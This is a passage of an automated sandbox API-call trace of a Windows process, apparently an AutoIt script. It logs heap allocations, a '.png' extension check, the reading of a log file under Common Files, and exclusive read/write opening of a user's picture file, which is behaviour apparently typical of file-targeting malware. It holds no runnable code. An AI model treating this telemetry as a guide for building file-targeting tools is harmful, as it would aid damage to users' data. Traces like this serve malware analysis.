0x7af598 [0039.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0039.532] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0039.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0039.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0039.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0039.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af598 [0039.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0039.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0039.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0039.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0039.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0039.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8891f0 [0039.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0039.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0039.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0039.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0039.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0039.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0039.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0039.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0039.533] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0039.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0039.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0039.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0039.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0039.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0039.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0039.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0039.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0039.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0039.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0039.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0039.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0039.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0039.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0039.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0039.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0039.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0039.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0039.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0039.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0039.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0039.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0039.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0039.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0039.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0039.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0039.533] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.533] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ng", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.533] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="png", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.534] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".png", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0039.534] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0039.534] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0039.534] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0039.534] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0039.534] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0039.534] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0039.534] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0039.534] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0039.534] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0039.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0039.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0039.534] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0039.534] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0039.534] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0039.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0039.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0039.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0039.534] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0039.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0039.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0039.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0039.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0039.534] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0039.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0039.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0039.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0039.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0039.534] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0039.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0039.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0039.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0039.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0039.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0039.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0039.535] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0039.535] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0039.535] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0039.535] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0039.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0039.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0039.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0039.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0039.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0039.535] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0039.535] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0039.535] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0039.535] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0039.535] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0039.535] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0039.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0039.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0039.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0039.535] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0039.535] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0039.535] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0039.535] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1850 | out: hHeap=0x770000) returned 1 [0039.535] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0039.535] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0039.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0039.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0039.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0039.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0039.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0039.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0039.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0039.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0039.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0039.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0039.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0039.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0039.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0039.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0039.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0039.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0039.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db378 [0039.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0039.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0039.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0039.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0039.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1850 | out: hHeap=0x770000) returned 1 [0039.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0039.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0039.536] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0039.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0039.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0039.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0039.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0039.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0039.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0039.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0039.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0039.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0039.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0039.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0039.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0039.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0039.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0039.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0039.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0039.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0039.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0039.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0039.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0039.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0039.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0039.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0039.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0039.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0039.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0039.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0039.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0039.537] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0039.538] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0039.538] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0039.538] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0039.538] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0039.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0039.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab0010 [0039.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0039.538] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0039.538] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x295a, lpOverlapped=0x0) returned 1 [0039.538] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0039.538] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x295a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0039.538] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0039.538] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.538] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.538] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0039.539] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0039.539] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0039.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0039.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0039.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0039.539] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0039.539] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0039.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0039.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0039.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0039.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0039.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0039.539] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0039.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0039.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0039.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0039.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0039.539] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0039.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0039.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0039.539] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0039.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x8899d0 [0039.540] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x8899d0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0039.540] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\KmZe-_JDZKS16W.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\kmze-_jdzks16w.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0039.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0039.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0039.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0039.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0039.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0039.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0039.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0039.540] FreeLibrary (hLibModule=0x76e10000) returned 1 [0039.540] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0039.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0039.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0039.540] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0039.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0039.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0039.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0039.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0039.540] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0039.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0039.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0039.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0039.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0039.540] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0039.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0039.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0039.541] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0039.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889778 [0039.541] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x889778, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0039.541] FreeLibrary (hLibModule=0x76e10000) returned 1 [0039.541] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0039.541] 